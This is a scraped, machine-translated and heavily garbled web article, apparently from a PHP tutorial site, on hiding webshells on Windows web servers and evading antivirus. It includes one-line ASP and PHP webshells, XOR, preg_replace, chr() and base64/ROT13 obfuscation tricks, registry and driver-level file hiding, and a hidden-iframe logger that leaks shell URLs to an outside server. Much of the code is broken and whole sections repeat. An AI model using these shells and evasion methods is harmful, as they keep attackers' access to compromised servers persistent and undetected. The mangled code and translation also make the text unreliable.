file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
3. The "security" of webshell
1. Regarding the hiding of webshell
(1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
|
1
|
c:>copy3.asp.C:aux.asp |
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone.Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it.②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands:file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.pngclick to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder.For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.Default
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.Default
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:Default
WINDOWS
xlkfs
.dat
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement: WINDOWS asp includes the statement: , fill in the path directly, and the file path is the path on the web server.xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files. In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly.Default1include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.phpThis aaa The content of 1.php on is
Default
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer:auto_prepend_file =hehe.phpThen look atinclude_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website.③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times.4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace.For example, like the codeDefault
@ +$ _ )++
;// Here ++ let '_' 自 1$ __= ("#" ^ "|";
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
("."^"~"). ( $__="#" "|"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^)
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)($str)
funfunc The binary value of functionwill be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]); ?>1234
{
}echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
])
; ?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the(here is the theme in html) in the form cmd with funfunc. The value in the post form is written as {${phpinfo()}} (of course the phpinfo() here can be replaced with other commands), through replacement, it will become Intofunfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly.3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed.4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:Default
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form.Avoid specific script language: aspx one sentenceDefault
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:Default
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为Default
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner.(2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs.The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code.ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side.(3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used.You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code.5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors.For example, the universal password here:Default
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
="1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.Then use the frame to mount the horse:
Default
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request . =ServerVariables
("HTTP_Referer")setfsserver .
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
How do you modify data stored in a PHP session?Apr 27, 2025 am 12:23 AMTomodifydatainaPHPsession,startthesessionwithsession_start(),thenuse$_SESSIONtoset,modify,orremovevariables.1)Startthesession.2)Setormodifysessionvariablesusing$_SESSION.3)Removevariableswithunset().4)Clearallvariableswithsession_unset().5)Destroythe
Give an example of storing an array in a PHP session.Apr 27, 2025 am 12:20 AMArrays can be stored in PHP sessions. 1. Start the session and use session_start(). 2. Create an array and store it in $_SESSION. 3. Retrieve the array through $_SESSION. 4. Optimize session data to improve performance.
How does garbage collection work for PHP sessions?Apr 27, 2025 am 12:19 AMPHP session garbage collection is triggered through a probability mechanism to clean up expired session data. 1) Set the trigger probability and session life cycle in the configuration file; 2) You can use cron tasks to optimize high-load applications; 3) You need to balance the garbage collection frequency and performance to avoid data loss.
How can you trace session activity in PHP?Apr 27, 2025 am 12:10 AMTracking user session activities in PHP is implemented through session management. 1) Use session_start() to start the session. 2) Store and access data through the $_SESSION array. 3) Call session_destroy() to end the session. Session tracking is used for user behavior analysis, security monitoring, and performance optimization.
How can you use a database to store PHP session data?Apr 27, 2025 am 12:02 AMUsing databases to store PHP session data can improve performance and scalability. 1) Configure MySQL to store session data: Set up the session processor in php.ini or PHP code. 2) Implement custom session processor: define open, close, read, write and other functions to interact with the database. 3) Optimization and best practices: Use indexing, caching, data compression and distributed storage to improve performance.
Explain the concept of a PHP session in simple terms.Apr 26, 2025 am 12:09 AMPHPsessionstrackuserdataacrossmultiplepagerequestsusingauniqueIDstoredinacookie.Here'showtomanagethemeffectively:1)Startasessionwithsession_start()andstoredatain$_SESSION.2)RegeneratethesessionIDafterloginwithsession_regenerate_id(true)topreventsessi
How do you loop through all the values stored in a PHP session?Apr 26, 2025 am 12:06 AMIn PHP, iterating through session data can be achieved through the following steps: 1. Start the session using session_start(). 2. Iterate through foreach loop through all key-value pairs in the $_SESSION array. 3. When processing complex data structures, use is_array() or is_object() functions and use print_r() to output detailed information. 4. When optimizing traversal, paging can be used to avoid processing large amounts of data at one time. This will help you manage and use PHP session data more efficiently in your actual project.
Explain how to use sessions for user authentication.Apr 26, 2025 am 12:04 AMThe session realizes user authentication through the server-side state management mechanism. 1) Session creation and generation of unique IDs, 2) IDs are passed through cookies, 3) Server stores and accesses session data through IDs, 4) User authentication and status management are realized, improving application security and user experience.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
